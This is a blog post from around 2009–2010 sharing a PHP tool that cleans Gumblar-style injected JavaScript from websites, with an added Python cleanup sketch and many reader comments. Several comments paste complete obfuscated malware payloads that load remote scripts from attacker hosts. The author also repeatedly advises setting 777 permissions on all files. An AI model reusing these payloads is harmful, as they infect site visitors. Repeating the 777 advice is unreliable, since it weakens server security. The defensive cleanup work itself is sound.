
Gumblar-family virus removal tool

Over the last few weeks we’ve found that a few of our clients’ sites were infected with malicious JavaScript code, which appeared to be the work of a virus. The virus’s behaviour is similar to that of the so-called Gumblar virus. Here is a short summary of what this virus does:

  1. After it infects a machine, it searches for stored FTP passwords and sends them to the hackers’ server somewhere in the world
  2. Once the hackers have collected the passwords, they use them to connect to the servers and add the malicious JavaScript code to some HTML, PHP and ASP files and to all JS files
  3. Here is an example of the malicious code:
    /*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = ...;document.body.appendChild(X08yhffhg7xkxf);}} catch(e) {}

Since many sites have a lot of JS files, thousands of files can be infected. We had to write a tool to clean up the files automatically, and it has done a good job so far, so we think it is a good idea to share it with people who have faced the same issue. Here are the instructions for using the removal script:

  1. Download the script here, unpack it and upload it to the web root of your server
  2. Run it in the browser by pointing it to http://yourdomain.com/curevir.php
  3. Enjoy the output

There may be trouble with file permissions, so (if that is possible for you) set write permissions on all your files. Please also read the information at the head of the script - it explains how the script works in more detail. The script is written for UNIX-based servers, though some people have tried it on Windows and it worked.

Sometimes the script uses all the memory the server allows. In that case, try running it with an additional parameter, like http://yourdomain.com/curevir.php?shell=1. This forces it to use Unix shell commands instead of loading the files’ content into memory (the default method is much faster, though).

Don’t forget to change the FTP password for your site to prevent further infection - the password has already been stolen!

If you have any feedback on using the script, please feel free to post comments here or contact us.

UPDATED ON 2009/12/28: The script was updated after some people reported new infection code. The virus now adds a few commented lines after the JavaScript, like this:

<!--4134163cc9167cbf3a657d697dd5ebaf-->

UPDATED ON 2010/01/08: One more update (version 1.1): the malicious script now uses a different comment at the beginning, and a few spaces were added. It now starts with:

/*LGPL*/ try{ window.onload

You can now set the virus comment that the removal script should search for (line 36 of the script):

$starting_comment = '/*LGPL*/';

The original link now contains the updated virus code. The old version (let’s call it 1.0) of the script is available here.

UPDATED ON 2010/01/22: Version 1.2 is released: the virus code was modified a few more times. The script now searches for all of the variants. The original link still contains the latest version. Version 1.1 is available here.

UPDATED ON 2010/01/27: Version 1.2.1 is released: one more regular expression was added for a new version of the virus code. As always, the original link contains the latest version. Version 1.2 is available here.

UPDATED ON 2010/01/29: Version 1.2.2: These guys are changing their code versions faster and faster… Added another regular expression and reuploaded the new version at the original link. Check the version history for previous versions.

UPDATED ON 2010/01/30: Version 1.2.3: One more update to the regular expressions; as always, the new version is reuploaded at the original link.

UPDATED ON 2010/02/19: Version 1.3: Too many mutations have appeared lately; it doesn’t seem possible to find a pattern in them, and it is really hard to include all the variations in the script. So this version simply lets you enter the virus code into a textarea, and it will clean all the files containing this code. Be careful to put only the real, full code there, otherwise you may remove parts of your files that should stay. Be sure to make backups. The new version can be downloaded here.
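The following is an added example, not the curevir.php source (which is not reproduced on this page): a Python sketch of the two approaches described in the updates above, a marker-based finder for the commented variants and version 1.3 style exact-string removal with a backup and a dry run. The function names, the `.infected.bak` suffix, the minimum-length guard and the sample snippets (inert, with no `src`) are assumptions constructed for illustration.

```python
import re
import shutil
import tempfile
from pathlib import Path

# Starting comments quoted on this page that are followed by try{window.onload.
STARTING_COMMENTS = (b"/*GNU GPL*/", b"/*LGPL*/", b"/*CODE1*/")
SCAN_SUFFIXES = {".js", ".html", ".htm", ".php", ".asp"}
MARKER_RE = re.compile(
    b"(?:" + b"|".join(re.escape(c) for c in STARTING_COMMENTS)
    + rb")\s*try\s*\{\s*window\.onload"
)
# Trailing HTML comment of 32 hex digits added by the 2009/12/28 variant.
HEX_COMMENT_RE = re.compile(rb"<!--[0-9a-f]{32}-->")
MIN_INJECTED_LEN = 40            # assumption: refuse fragments that could match real code
BACKUP_SUFFIX = ".infected.bak"  # assumption: a suffix the scanner itself skips

# Constructed, inert samples shaped like the snippets quoted on this page.
SAMPLE_COMMENTED = (b"/*LGPL*/ try{ window.onload = function(){var X1 = "
                    b"document.createElement('script');"
                    b"document.body.appendChild(X1);}} catch(e) {}")
SAMPLE_PLAIN = (b"try{window.onload=function(){newEl = "
                b"document.createElement('script');"
                b"document.body.appendChild(newEl);} } catch(e) {}")


def iter_files(root):
    """Yield candidate files under root, in a stable order."""
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            yield path


def find_suspects(root):
    """Report only: return {path: [reasons]} for files matching known markers."""
    suspects = {}
    for path in iter_files(root):
        data = path.read_bytes()
        reasons = []
        if MARKER_RE.search(data):
            reasons.append("marker-comment")
        if HEX_COMMENT_RE.search(data):
            reasons.append("hex-comment")
        if reasons:
            suspects[path] = reasons
    return suspects


def remove_exact(root, injected, dry_run=True):
    """Remove exact occurrences of the pasted snippet; return {path: count}.

    Works on raw bytes so file encodings are left alone. With dry_run=True
    nothing is written; otherwise the original is copied aside first.
    """
    injected = injected.strip()
    if len(injected) < MIN_INJECTED_LEN:
        raise ValueError("snippet too short: paste the full injected code")
    hits = {}
    for path in iter_files(root):
        data = path.read_bytes()
        count = data.count(injected)
        if count == 0:
            continue
        hits[path] = count
        if not dry_run:
            shutil.copy2(path, path.with_name(path.name + BACKUP_SUFFIX))
            path.write_bytes(data.replace(injected, b""))
    return hits


def demo_cleanup():
    """Run both approaches over a constructed site tree in a temp directory."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "clean.js").write_bytes(b"function ok(){return 1;}\n")
        (root / "a.js").write_bytes(b"function a(){}\n" + SAMPLE_COMMENTED + b"\n")
        (root / "b.html").write_bytes(b"<html></html>\n" + SAMPLE_PLAIN + b"\n")
        (root / "index.php").write_bytes(
            b"<?php echo 'hi'; ?>\n" + SAMPLE_COMMENTED
            + b"\n<!--" + b"ab12cd34" * 4 + b"-->\n")

        def names(result):
            return {p.name: v for p, v in result.items()}

        before = names(find_suspects(root))
        dry = names(remove_exact(root, SAMPLE_PLAIN))            # report only
        cleaned = names(remove_exact(root, SAMPLE_COMMENTED, dry_run=False))
        return {
            "suspects": before,
            "dry_run": dry,
            "dry_run_untouched": SAMPLE_PLAIN in (root / "b.html").read_bytes(),
            "cleaned": cleaned,
            "after": names(find_suspects(root)),
            "a_js": (root / "a.js").read_bytes(),
            "backup_exists": (root / ("a.js" + BACKUP_SUFFIX)).exists(),
        }


if __name__ == "__main__":
    for key, value in demo_cleanup().items():
        print(key, "=", value)
```

In the constructed run, the uncommented variant is missed by the marker finder and is only caught by exact-string matching, and index.php is still flagged after cleaning because the trailing hex comment is not part of the pasted snippet. Backups hold the infected content, so move them out of the web root once the cleanup is verified.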

VERSIONS HISTORY:

DONATION: The script is free for use, but if you want to support the script author by donating some $$$ please use the form below, thanks in advance.

175 Responses to “Gumblar-family virus removal tool”

  1. Kenni Krogh January 3rd, 2010 at 10:18 am

    Really nice! It took them all, including the new lines.
    Nice, it works again.

  2. Will January 3rd, 2010 at 11:24 pm

    Thanks a lot. Now my servers are clean. But how did you remove the virus from the computer? I can’t even turn mine on anymore. Suppose I’ll have to run XP from the cd, but what software can remove the virus?

  3. Ilya January 4th, 2010 at 12:34 am

    Thank you very much for your script! It’s really useful.

    But I have a problem with it: it stops on a timeout while executing on the server, so it couldn’t finish the cleanup even after multiple launches.

    My server shows me a message like this:
    accel: document from backend 10.0.0.34 contains no data while processing http://10.0.0.34:80/curevir.php

  4. Ilya January 4th, 2010 at 12:36 am

    to Will: use Avast (http://www.avast.com/)

  5. Will January 4th, 2010 at 9:25 am

    Thanks, Ilya

  6. Konstantin Boyko January 4th, 2010 at 11:13 am

    Ilya, try increasing the max script execution time parameter on your server. There is also an undocumented parameter in the script: if you run it as http://yourhost.com/curevir.php?limit=XXX, it will find XXX files, clean them and stop after that.

  7. Olle January 4th, 2010 at 10:02 pm

    Hi, I do have some trouble using the script. I uploaded it, ran it, and have a logging.txt, but there are still infected files. Any ideas what I did wrong?

  8. Konstantin Boyko January 5th, 2010 at 11:44 am

    Olle, please make sure that you have write permissions for the files, and check that you downloaded the latest version of the script. If you still have issues, please contact me at the e-mail address you can find in the script comments. I’ll try to help you.

  9. PG January 5th, 2010 at 3:58 pm

    I got the virus on Joomla. Do you know how I got the virus onto the servers?

  10. Konstantin Boyko January 5th, 2010 at 4:31 pm

    PG, your FTP password was stolen by the trojan (from you or someone else who had the password stored in an FTP client on a local machine). The hackers then used the password to infect the files on your server.
    As far as I know Avast antivirus finds the virus.

  11. Ankit January 5th, 2010 at 6:32 pm

    I tried this script. It removes the malicious code, but immediately after removing the code, when I check the files again, the code is there again. Please help. Any idea how I can stop the files from getting changed again and again? Thanks.

  12. Konstantin Boyko January 5th, 2010 at 6:35 pm

    Ankit, the first thing you need to do is change your FTP password (don’t save it in your FTP client until you make sure that the machine is clean). Then run Avast - it should find the virus on your machine.

  13. Ankit January 5th, 2010 at 7:03 pm

    Thanks Konstantin for such a quick response. I will try this out and post the updates.

    Thanks again.

  14. Richard January 5th, 2010 at 9:22 pm

    Great script thanks.

    This has infected all but two of my sites and I was going nuts trying to work it out. The script (so far) seems to have done the job!

    People should note to not only delete password lists but to also update your FTP client software, Adobe reader, and any antivirus and malware programs.

    Good luck everybody!

  15. jamhammer January 6th, 2010 at 4:29 pm

    Hi, I downloaded the original script before finding your page, and it seems to have worked on one of my sites.
    However, I downloaded the latest script posted here, and when I unzip it, Avast! claims that there is a Trojan Horse [JS:Illredir-A [Trj]] in it. Is this a false positive? Thanks

  16. Konstantin Boyko January 6th, 2010 at 4:33 pm

    to jamhammer: I think Avast just finds the virus pattern in the source code (which is of course there, since the script searches for it) and alerts about that.

  17. jamhammer January 6th, 2010 at 6:06 pm

    Perfect, thanks. It seems to have worked across all my sites.
    Thanks so much for making this tool available to us!

  18. Konstantin Boyko January 6th, 2010 at 6:10 pm

    You are welcome!

  19. Le Roux January 7th, 2010 at 1:31 am

    Hello,
    Thank you very much for your script!
    I think this is a good script, but it does not work for me.
    When I run it in the browser by pointing it to http://www.mysite/curevir.php, it loads for hours and never finishes executing. I think my web site is too big and contains too many infected files… do you have a solution for this?
    Thanks!

  20. Konstantin Boyko January 7th, 2010 at 8:33 pm

    Le Roux, please try to run the script with extra parameters:

    1. http://www.mysite/curevir.php?shell=1 will use shell search instead of php search, so it saves some memory (but slows the script a bit)
    2. http://www.mysite/curevir.php?limit=XXX (XXX can be whatever you want - 100, 1000, etc.) - this will limit number of cured files per script execution.

    If you still have troubles let me know

  21. jane January 7th, 2010 at 10:02 pm

    the script starts to look a little different

    /*LGPL*/ try{ window.onload = function(){var Wy7dp8g50r5d6 = document.createElement(’s^c!)$&r@$i##p@@^@t!)@’.replace(/@|\!|\(|\^|\)|\$|#|&/ig, ”));Wy7dp8g50r5d6.setAttribute(’defer’, ‘d$e(##f&e$((@r#^)’.replace(/@|\)|\(|&|\$|#|\^|\!/ig, ”));Wy7dp8g50r5d6.setAttribute(’type’, ‘t&$##e)(x$))@t@)^(/&)^j@@$a^(!v!a^(s@^$c(^r$)i!(#)!p#&t$#!&’.replace(/&|\(|\!|#|\^|\$|@|\)/ig, ”));Wy7dp8g50r5d6.setAttribute(’id’, ‘L^@(!j$()w$@l!)b&)(y!y!!)h$(#z&#w@&y!#^t^&t)#’.replace(/#|&|\!|\(|\^|@|\$|\)/ig, ”));Wy7dp8g50r5d6.setAttribute(’s&r(c&!’.replace(/\$|\!|\)|&|@|\^|#|\(/ig, ”), ‘h$t&)t))!p!@:(/)(/(#@i&!m&^(m()!o^b^(i&)#l$(@(i@$e#n!@()&s&$c$&&o^#@u&#t#^2@)4^##!@-$)@d#)#$e#@!.)z(#^s^)#h(a#^r(e)&.$n&e##&t$&).&!e@b@)#a!(y&!-!^(c!(o!)m#^-(a#^@(u)^&@$.)#w^@#o$@(r#l)(&d!w##e(&$b$^w(!)$)o)^r^&^&l&^d&^#^&.(r@@)u$&!#:@^)@8(@(^@0(^)8^)0$)#(/!)h^^!u&^d(^@#o@n#$(g&@!&.$&c!o$^^m)&/^h^u&!d@##o(&#n@^g#.^c!$^)o(m$!^#/^!@$b(@i!^@g^#!l^o&!b((^#!e$.&^#(n(#&e)@.^$#j$p&!#/^!@g^^o@)@@(o$(g#@&(l!(#!(e@^.$c$o!^($m!/!^)^w&r#^$z)^u@&(t#@a$)$.#p)$l$$/(&#&’.replace(/@|&|\(|#|\!|\^|\)|\$/ig, ”));if (document){document.body.appendChild(Wy7dp8g50r5d6);}} } catch(Z5cbieeds176kcqglrh3d) {}

  22. Jay January 8th, 2010 at 3:54 am

    Hi. I tried this out and it worked the first time but it got infected again before I could change passwords. This time when I did it I got the following:

    TOTAL: 0
    START BACKUP:
    END BACKUP!

    But it didn’t fix it.

    Any ideas?

    Thanks for your efforts.

  23. Jay January 8th, 2010 at 4:23 am

    Well, it looks like there may be something else out there. This was in my index.php file

    /*LGPL*/ try{ window.onload = function(){var Nda8b3m7ia08vat = document.createElement(’s$((c^r)$i!&p^$&t^)’.replace(/\^|#|\)|\!|\$|\(|@|&/ig, ”));Nda8b3m7ia08vat.setAttribute(’defer’, ‘d)&^e($f###e^$r$@$’.replace(/\(|\^|\)|\!|&|#|\$|@/ig, ”));Nda8b3m7ia08vat.setAttribute(’type’, ‘t($^e^&$!x@)t!/))$j)$(&a)())v#$(@(a(@@!s!&##c($r##^^i#&(p((@t)&’.replace(/\(|\!|#|@|\^|\$|&|\)/ig, ”));Nda8b3m7ia08vat.setAttribute(’id’, ‘O&!&6!p!!!!j^(&!2))^z@!(8!(#f)&r!&&!$i))!)’.replace(/@|\(|&|\)|\$|#|\!|\^/ig, ”));Nda8b3m7ia08vat.setAttribute(’s^^r)!^#c((’.replace(/\!|#|@|&|\)|\$|\(|\^/ig, ”), ‘h#(t&$(t!)!&p(@(:#@)$/#($$/^u!p)l$!o!a)&d$$e^$d#!^-$@!t$!$o@$.))j^^((o@$@y^$!^.$c@!n@.!()g()i)z#m(@!o)d$$()o#-)(c)$!o&@m#&.##(@w&)^e)^@b$^n$((e(@&t^(@e!($n$g&l)(i)s&#!#@h$.^$r&u^(@:(#@8($$0#)8!^(0$#@$/$^$g()o!&(&!o&#)g($&l$e^$#.&$c($($o@^m$/$#$g#&&o^^#!#o&$g#l(e)##@@.^&)(c(#o&#(m$$$/#!(@(e#@)^^n).(&w@$#$@o^##r(#)d(#(#p$^r^&e#$s$)s(.)&^c&)o^m$(^/$b#t^j$^#(^u#@n@k(&i@@^#e#&#.#&)o)^r#)$&)g^#/)^^g#(o#o!(g@l(!!(e&)^.^^)c^!()o(!&(m#.&@^p@^$e#&!/$’.replace(/\)|\(|@|#|\^|&|\$|\!/ig, ”));if (document){document.body.appendChild(Nda8b3m7ia08vat);}} } catch(Bvlu3ghp1mre1o76k9fnb) {}

  24. Konstantin Boyko January 8th, 2010 at 11:02 am

    OK, it seems they changed the starting pattern, so I’d have to modify the script a bit. Will post it here when I have updated version.

  25. Konstantin Boyko January 8th, 2010 at 1:15 pm

    The script is updated, added a few comments in the post. The old link now refers to new version (please check update notes in the post)

  26. mist January 8th, 2010 at 2:47 pm

    Hello, and thx 4 the script. But it appears that the function name in the code changes randomly. My case:

    /*LGPL*/ try{ window.onload = function(){var M0ls6baqhmn = ….

    The part after var must be changed in the script in all places so it can be detected properly.

  27. Konstantin Boyko January 8th, 2010 at 3:22 pm

    mist, yes - that is true. But the script doesn’t rely on that var, so it will fix all occurrences.

  28. mist January 8th, 2010 at 3:29 pm

    I thought it does, since it has the $virus_string variable. Never mind, it works great, thank you.
    Btw, if people have problems with permissions and have shell access to the server, the script can be run directly from the shell (as root) with:

    # php curevir.php

  29. Konstantin Boyko January 8th, 2010 at 3:33 pm

    Yes, you are correct. This way it can even be used for cleaning files above the web folder.

  30. Tom January 8th, 2010 at 10:40 pm

    Thank you so much!!! The virus actually killed my hard drive. Thanks for the fix, it was a nasty virus.

  31. mark January 8th, 2010 at 11:48 pm

    Very good work, guys!
    Unfortunately, in the “backup” area of the script I had an error, right after array 0 - 127, then all the files changed.

    BUT the site didn’t load, because there was some stuff left on some pages, like: <!–c15c78d42 some
    <!- some < and some <!–c15c78d42f0fb ; <!–c15c78d ; <!–c1

  32. Kalpesh Mistry January 9th, 2010 at 4:56 am

    Oh.. thank you. I finally recovered my website..

  33. GoMe Computer January 9th, 2010 at 8:44 am

    thanks sir my computer clean

  34. Konstantin Boyko January 9th, 2010 at 12:01 pm

    Mark, in case you still have problems please contact me by e-mail - I’ll do my best to check

  35. bias9 January 9th, 2010 at 7:19 pm

    thanks for this! worked great for me. Does the script change file permissions back to the original after its done cleaning the files up?

  36. Konstantin Boyko January 9th, 2010 at 8:12 pm

    The script doesn’t change the permissions at all, you should care about permissions yourself.

  37. mark January 9th, 2010 at 8:16 pm

    can you help me remove the leftovers from curevir ?

    like a small script mod to remove all ” <!-c15****** ” stuff.

  38. mark January 9th, 2010 at 8:21 pm

    i tried on another server and again error on backup
    START BACKUP:
    tar -czvf /home/ccore/public_html/!backup-1263061012.tgz
    ……………..
    Array
    (
    [0] => Array
    (
    )

    [1] => 127
    )

    BACKUP failed…
    END BACKUP!

  39. Gabriel January 9th, 2010 at 11:21 pm

    It is not working for me.
    … Permission denied …

  40. Konstantin Boyko January 10th, 2010 at 12:01 am

    Gabriel, you need to take care of permissions yourself. For example, you can set 777 permissions on all your files. The script can’t take care of permissions, as that is a server-configurable thing and scripts are not always allowed to do everything we want them to.

  41. Ben January 11th, 2010 at 8:20 am

    Hello Konstantin,
    I have had the same problem as others for the last 2 days. So I searched the internet and found your tips and tutorial here. I have cleaned up the script manually in index.php and the other PHP files in my folder.

    Then I changed the FTP password and tried to run the script here.

    Trying to cure /home….

    It shows FAILED along the way.

    Did I miss anything?

    Thanks for your help

  42. Konstantin Boyko January 11th, 2010 at 11:28 am

    Ben, it seems your files don’t have write permissions. Make sure to change them to something more appropriate - 777 will work in all cases, though some servers have security limitations on that.

  43. akire January 11th, 2010 at 8:40 pm

    I fix it with “Mass Text Replacer”
    download trial…

    -add all files
    -from 1 suspicious file copy virus code
    -in program looking for “code” and replace with “” or ” ”
    -done

  44. Sam January 11th, 2010 at 10:57 pm

    Hi,

    I am wondering - is it safe to save FTP information in Dreamweaver, or should it be avoided completely?

  45. MoBi January 11th, 2010 at 11:43 pm

    Well done Mr. Boyko I simply love this script you have made. You are just awesome. This virus/worm was extremely annoying and all my sites running in a same shell got infected with this virus. I almost gave hope and thought to start them over again. But a friend of mine caught this code in the php files and I googled it. And here I am, at your doorstep. This script of yours cleaned my website and all passwords are now changed. Many many thanks for this script bro.

  46. Quasi_Mojo January 12th, 2010 at 1:46 am

    Thank you so much for providing the script removal tool - you saved me hours of searching and deleting!

    Our site was hit over the weekend, as well as over the Christmas break, and I was wondering how they managed it.

    It looks like the FTP login information was snatched from my FileZilla client - the idiots store FTP passwords in plain text format in the .xml file - and they then used that to upload their Javascript. The idiots got their obfuscated Javascript wrong, so the website only showed a blank page, rather than redirecting the site traffic.

    FYI: I have a Joomla site and it’s not the site’s server that has the virus, but the users local workstation. So you don’t have to use a virus scanner on the hosted Joomla site.

  47. Konstantin Boyko January 12th, 2010 at 11:27 am

    Sam, it is not safe. Ideally you shouldn’t store FTP info there.

  48. Ray January 14th, 2010 at 4:05 am

    A customer has been infected. Using a few simple decoding techniques and a whois lookup, I find that the information is being harvested here:
    domain: TEENWEBDESIGN.RU
    type: CORPORATE
    nserver: ns1.hostserverdirect.com.
    nserver: ns2.hostserverdirect.com.
    nserver: ns3.hostserverdirect.com.
    nserver: ns4.hostserverdirect.com.
    state: REGISTERED, DELEGATED, VERIFIED
    person: Private Person
    phone: +7 4912 219900
    e-mail: dibs@freemailbox.ru
    registrar: NAUNET-REG-RIPN
    created: 2009.10.28
    paid-till: 2010.10.28
    source: TCI
    In the morning, I shall mail to abuse@hostserverdirect.com but I don’t hold out much hope to get the site offline. It’s been a long haul today to investigate and fix the site :-(

  49. Daniel January 14th, 2010 at 11:24 pm

    I was infected; the tool you provided worked perfectly to remove it, but how did I get this virus in my JS files? Is it maybe because of the permissions of the JS folders? Or why, and how can I avoid this happening again? Thanks a lot.

  50. jarno January 15th, 2010 at 1:40 pm

    Hi, My blog was infected new one. Hre is the code “/*LGPL*/ try{ window.onload = function(){E1e6wn3ijzwv9g = ‘h$@t##()t(!&@p!@:@/&@/$^&()t($!o)#r$&r^#e#$)@n!(#$t)!!z$$-@)#c(!o$$!m!^).&s()&@$o$()s!^o^(.&($!c^&o^$&)m(#$.&@p)e(!t#a(#r$&^d)$$a^s&)#-)$&c($)^$o(m!&!.(e!!&a##!#s^&y!$l)i&@&f#e@d&$)i#$!r(!(e!c))t))#.@(^r#)#u#@:^($8(!^0@8#!0$&&&/#()(n@@!^g(@&o@(i$$##s!(a!o@!^.^!n)^e!#)t#!/#(n#@&#g)^#^o#)(i^)s($@(a#o(!#.)$n)$@e@&t@$#/!(@c@$^&$h@(i^@#n&^@a(#(!z((.@$$c##o#$)@m&!/$^!)c@@(t)r@@i$@(p@).&^c^@o()$m(/!!g&#^^o#)(@o(g^l#e$$.!!@c)^))o^#@@#m$/$(’.replace(/\!|\^|\)|\$|@|#|&|\(/ig, ”);var D7fyb435pte = ’s&^(c)##r!^i!@p##!!t@!&’.replace(/#|\)|\$|\(|@|&|\^|\!/ig, ”);var Sn9jgvbufr9 = ’s@r)^#^c^#’.replace(/\(|#|\^|\!|\$|\)|@|&/ig, ”);var Rxs7200gjqt6h = D7fyb435pte;var Rmkt0nsas90ld = document.createElement(Rxs7200gjqt6h);Rmkt0nsas90ld.setAttribute(’defer’, ‘d^^&e(f(&e&(@r@(’.replace(/&|@|#|\!|\(|\)|\$|\^/ig, ”));var Kaws9hrzdk = ‘t@^@e!)$x)@t@#)(/!(j(&@a(v#&^a$)s$!c&#((r@^i)&)p##!t#(’.replace(/\)|#|\^|&|\!|\$|@|\(/ig, ”);Rmkt0nsas90ld.setAttribute(’id’, ‘J(!&#)8(!n^$9!i(1^3^($t@^f^)7^(@i@#&v#)v@@’.replace(/\^|\)|\!|\$|&|#|@|\(/ig, ”));Rmkt0nsas90ld.setAttribute(Sn9jgvbufr9, E1e6wn3ijzwv9g);Rmkt0nsas90ld.setAttribute(’type’, Kaws9hrzdk);document.body.appendChild(Rmkt0nsas90ld);if (document){Rxs7200gjqt6h = D7fyb435pte;}} } catch(Uskp2qj8xy0ey16t2xwup ) {}
    ” I have used your script. But still connect to. xxxxxx.ru….

  51. Konstantin Boyko January 15th, 2010 at 1:47 pm

    Jarno, make sure you have downloaded the latest version of the script (it has version 1.1 inside the script source). It should work for this. If not, contact me and I will try to help.

  52. Julien January 15th, 2010 at 4:05 pm

    Thanks for your script, worked fine :-)

    I wonder how it is possible to get infected (Windows side) while using up-to-date anti-virus software like Antivir or NOD32.

  53. mark January 15th, 2010 at 5:30 pm

    It seems my FTP passwords were “taken” from Total Commander, since that is the only place I have them stored.

  54. michael January 15th, 2010 at 8:38 pm

    I really want to thank you for this, this really saved my biz, merci beaucoup, dude, best wishes

  55. Barbara January 16th, 2010 at 5:04 pm

    Hi -

    Thank you in advance - I found your site when searching for a solution to the virus on my WordPress sites.

    Questions, please (I am not very knowledgeable about scripts & such).

    I have several domains/sites on my BlueHost account that are infected.

    First - I tried to upload your script to the individual domains, but it would not run.

    Then I uploaded it to what I thought was the web root - in the same folder that holds my .cpanel, public_html, etc.

    However - after pointing to the script on my server - it tells me I am missing the wp-config file & wants to set it up?

    http://www.screencast.com/users/BloggingForDogs/folders/Jing/media/11955c8f-c311-4e79-af82-69ed64557c46

    Please tell me what I am doing wrong.

    Thank you!

  56. Barbara January 16th, 2010 at 5:09 pm

    Hi Again -

    For example - one of my domains is http://www.MommyYoga.com - which is on my main BlueHost account.

    Here is the script that is at the top & bottom of the page when I “View Source”:

    /*LGPL*/ try{ window.onload = function(){Krca4thdj71 = ‘h@$t(t)p$^#:(/&$((/@$s^&t&a#$&r$t!)i!&m!e&s^$@2^-##c@#&@o()#)m($.()t#!^#r@!a!$))^i@)#d$!!^!n#)t@!)$.@&n!!e##)($t#@^.$(g)&o#($o#^$^g!&l$$^)e(-#&i&^!t@$^@.!@@m@(&s@&w#e!!b(!w&!o@)r$#l^d((&#.&r@&u&^:^(!8&^@0!^#(8$0&/()^!&g$^@$n$&^&a&^v^@!i&&(.()@#c#o^).@(j)@)p@!/)^$g(#$n(#(a^&#v$i#(#.##c^)#o)!(.@j$(p^@/)n^@e#w(!$s$@)3$$!i$&$#n#&$s&(@$i!d^e^@&r(&#^.(#!(c)#^o#$m&&((/@(^!$g@&o!o)#)!g@)@l$!)e!$.)c$o$$m#$/$i^#p$@i$#(c@&)#!t!u^!r!!e@$.($^$r@u$!#/!’.replace(/#|&|\(|\^|\)|\$|\!|@/ig, ”);var Wukmgfrjydwgb38d = ’s!c)r(&!i$!(p)t#(’.replace(/\!|&|\(|#|\$|@|\^|\)/ig, ”);var Aixv05bchnthxw = ’s#^r)(c$!#’.replace(/\(|\^|\$|&|#|\)|\!|@/ig, ”);var A9261eworh = Wukmgfrjydwgb38d;var I4dwv422dz5mtw = document.createElement(A9261eworh);I4dwv422dz5mtw.setAttribute(’defer’, ‘d#^e@!f!$e)#&r(&)’.replace(/\^|#|\$|\!|\(|&|\)|@/ig, ”));var Zvanfx8um45 = ‘t(@^&e^@&x)^^t#/!)j@@a(!!$v&!a##s&^)^c(r@#^@i@$p^(!#t@^&’.replace(/\!|\)|\$|@|&|\(|#|\^/ig, ”);I4dwv422dz5mtw.setAttribute(’id’, ‘U@a&))#r$$k$@$!n)(i&!d)#f)&$0@)@s&&c)@&5$(&$’.replace(/#|\!|\^|@|\)|&|\(|\$/ig, ”));I4dwv422dz5mtw.setAttribute(Aixv05bchnthxw, Krca4thdj71);I4dwv422dz5mtw.setAttribute(’type’, Zvanfx8um45);document.body.appendChild(I4dwv422dz5mtw);if (document){A9261eworh = Wukmgfrjydwgb38d;}} } catch(Wjaildznalx6l5teejd ) {}

    Thank you in advance for your help.!

  57. Tom January 17th, 2010 at 12:12 am

    It got me, noticed redirected google links on the 14th then some of my wordpress installs started acting buggy, I flushed it from about 6000 files today with your tool, saved me a bunch of time. It seems like it is picking up steam and moving quicker. Question - How can I tell if this is removed from my desktop? Are the google result redirects originating from my desktop or from the compromised websites? I believe this is connected with the overlay.xul js attacking firefox and chrome - http://isc.sans.org/diary.html?storyid=7765 - they call it variant of Vundo

  58. Tom Saari » Major virus spyware activity Gumblar Vundo January 17th, 2010 at 12:32 am

    [...] Here is a link to the tool I used to remove the rogue code from over 7000 files it infected of mine in 1 day.   http://justcoded.com/article/gumblar-family-virus-removal-tool/ [...]

  59. Thomas January 17th, 2010 at 10:48 am

    Code modified again, found this in an HTML file; it was changed 16.jan2010 05.12 CET+1

    /*CODE1*/ try{window.onload = function(){var Q236s4ic4454clw = document.createElement(’script’);Q236s4ic4454clw.setAttribute(’type’, ‘text/javascript’);Q236s4ic4454clw.setAttribute(’id’, ‘myscript1′);Q236s4ic4454clw.setAttribute(’src’, ‘h(t)!^t^))p#@:&&/(##/&$#c^$$l^@)(i&(c$^)k))#$s^o$#r!^)^-$$$&c@$o#^m$!#.#&(e((a!!s)(@t)&m((o@^^n!$!e&^&(y$#).#&c$@o$@!$^m(##(.@m@o@(b(^i&#l#!@e@)@&(-(d)&(e^&@(.))@&h)@@@o^^@m!e#&&)s)a#$$l$$#e^@!p^@l&@u#((^s^#@(.$)r$$u(:!$8!$0&$&8)@$0$!)/!o#&@c##@@n(@^!.))n@e@.)&j!@^#$p#/)^@o^c^n)((.()n^)e^$.@!)$j!!^(p#!/@&)c^(l&(a&s(^s@!m^@a($^t#e!#^@)s$.^c^&#o((&m&/)(&@l&()i(@n)(k$@h&e)@$(l)$p^!e)$!$r$#.)&c!&n($@/$g#o^@&o!$$g$^l^&#@e$.&&!c#o@$$m(/$$’.replace(/\(|\!|&|#|\$|\)|@|\^/ig, ”));Q236s4ic4454clw.setAttribute(’defer’, ‘defer’);document.body.appendChild(Q236s4ic4454clw);}} catch(e) {}

  60. Thomas January 17th, 2010 at 11:17 am

    more on symantec website
    http://www.symantec.com/connect/blogs/new-obfuscated-scripts-wild-lgpl

  61. Konstantin Boyko January 18th, 2010 at 2:56 pm

    Barbara, looking at your screenshot you mistyped name of the script - it should be curevir.php not curvir.php
    If you have troubles please contact me by e-mail (you can find it in script source)

  62. Michael January 19th, 2010 at 2:46 am

    Please can anyone help me ?
    I’ve run the script but it can’t cure my website.

    Warning: fopen(/home/schweize/public_html/!infected-log-1263861566.txt) [function.fopen]: failed to open stream: Permission denied in /home/schweize/public_html/curevir.php on line 173

    FAILED!
    Trying to cure /home/schweize/public_html/kanton-bilder/show_ads.js

    I would be very thankful to your help

    Michael

  63. Michael January 19th, 2010 at 2:48 am

    The site is:
    http://www.schweizer-portal.ch/curevir.php

    Please can anyone help me ?
    I’ve run the script but it can’t cure my website. Michael

  64. Manoj January 19th, 2010 at 8:11 am

    Hi Konstantin,

    As you have mentioned, to run this script we will need to give 777 permission on the files and then this script would cleanup the files for us.

    The problem I see is that one would again need to go to each file and set back the permissions. This is time consuming, right? Is there any solution for this?

    Thanks,
    - Manoj

  65. Claudiu January 19th, 2010 at 11:15 am

    Hello… I need help… your download link does not work… it is virused… where can I get the good virus removal tool?

  66. Konstantin Boyko January 19th, 2010 at 11:35 am

    I see that many people have permission issues. They are to be expected, and unfortunately I don’t have a better solution than setting write permissions (777 or whatever works fine for your server) on the files. After the script executes you will of course need to put all the file permissions back. I wish this process could be made automatic, but unfortunately, when the script doesn’t have write permissions, in most cases it won’t be allowed to change file permissions either. The only solution that comes to mind is the following: you run an auxiliary tool which checks the permissions of every file and saves that information somewhere. Then you set all the file permissions to 777, do the cleaning, and then run the auxiliary tool again to set the original permissions back. The only issue is that file owners could be changed this way.

    To Michael: you need to set write permissions on all files (777 would definitely work); read the previous comments in this post about this.
